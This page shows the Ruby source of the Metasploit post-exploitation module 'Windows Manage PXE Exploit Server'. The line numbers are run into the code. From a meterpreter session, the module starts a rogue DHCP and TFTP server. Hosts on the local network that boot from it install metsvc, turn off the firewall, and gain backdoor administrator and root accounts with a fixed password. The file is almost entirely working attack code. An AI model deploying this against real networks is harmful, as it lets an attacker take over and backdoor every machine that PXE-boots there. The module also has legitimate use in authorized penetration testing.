Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/pxeexploit.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report78def initialize9super(10'Name' => 'Windows Manage PXE Exploit Server',11'Description' => %q{12This module provides a PXE server, running a DHCP and TFTP server.13The default configuration loads a linux kernel and initrd into memory that14reads the hard drive; placing a payload to install metsvc, disable the15firewall, and add a new user metasploit on any Windows partition seen,16and add a uid 0 user with username and password metasploit to any linux17partition seen. The windows user will have the password p@SSw0rd!12345618(in case of complexity requirements) and will be added to the administrators19group.2021See exploit/windows/misc/pxesploit for a version to deliver a specific payload.2223Note: the displayed IP address of a target is the address this DHCP server24handed out, not the "normal" IP address the host uses.25},26'Author' => [ 'scriptjunkie' ],27'License' => MSF_LICENSE,28'Platform' => [ 'win' ],29'SessionTypes' => [ 'meterpreter' ],30'Compat' => {31'Meterpreter' => {32'Commands' => %w[33lanattacks_add_tftp_file34lanattacks_dhcp_log35lanattacks_reset_dhcp36lanattacks_set_dhcp_option37lanattacks_start_dhcp38lanattacks_start_tftp39lanattacks_stop_dhcp40lanattacks_stop_tftp41]42}43}44)4546register_advanced_options(47[48OptString.new('TFTPROOT', [49false, 'The TFTP root directory to serve files from',50File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')51]),52OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),53OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),54OptBool.new('RESETPXE', [ true, 'Resets the server to re-exploit already targeted hosts', false ]),55OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),56OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])57]58)59end6061def run62if !client.lanattacks63print_status('Loading lanattacks extension...')64client.core.use('lanattacks')65elsif datastore['RESETPXE']66print_status('Resetting PXE attack...')67client.lanattacks.dhcp.reset68end6970# Not setting these options (using autodetect)71print_status('Loading DHCP options...')72client.lanattacks.dhcp.load_options(datastore)73740.upto(4) do |i|75print_status("Loading file #{i + 1} of 5")76contents = File.binread(::File.join(datastore['TFTPROOT'], "update#{i}"))77client.lanattacks.tftp.add_file("update#{i}", contents)78end79print_status('Starting TFTP server...')80client.lanattacks.tftp.start81print_status('Starting DHCP server...')82client.lanattacks.dhcp.start83print_status('PXEsploit attack started')84loop do85# get stats every 20s86select(nil, nil, nil, 20)87client.lanattacks.dhcp.log.each do |item|88print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " \89"(#{Rex::Socket.addr_ntoa(item[1])})")90report_note({91type: 'PXE.client',92data: item[0].unpack('H2H2H2H2H2H2').join(':')93})94end95rescue ::Interrupt96print_status('Stopping TFTP server...')97client.lanattacks.tftp.stop98print_status('Stopping DHCP server...')99client.lanattacks.dhcp.stop100print_status('PXEsploit attack stopped')101return102end103end104end105106107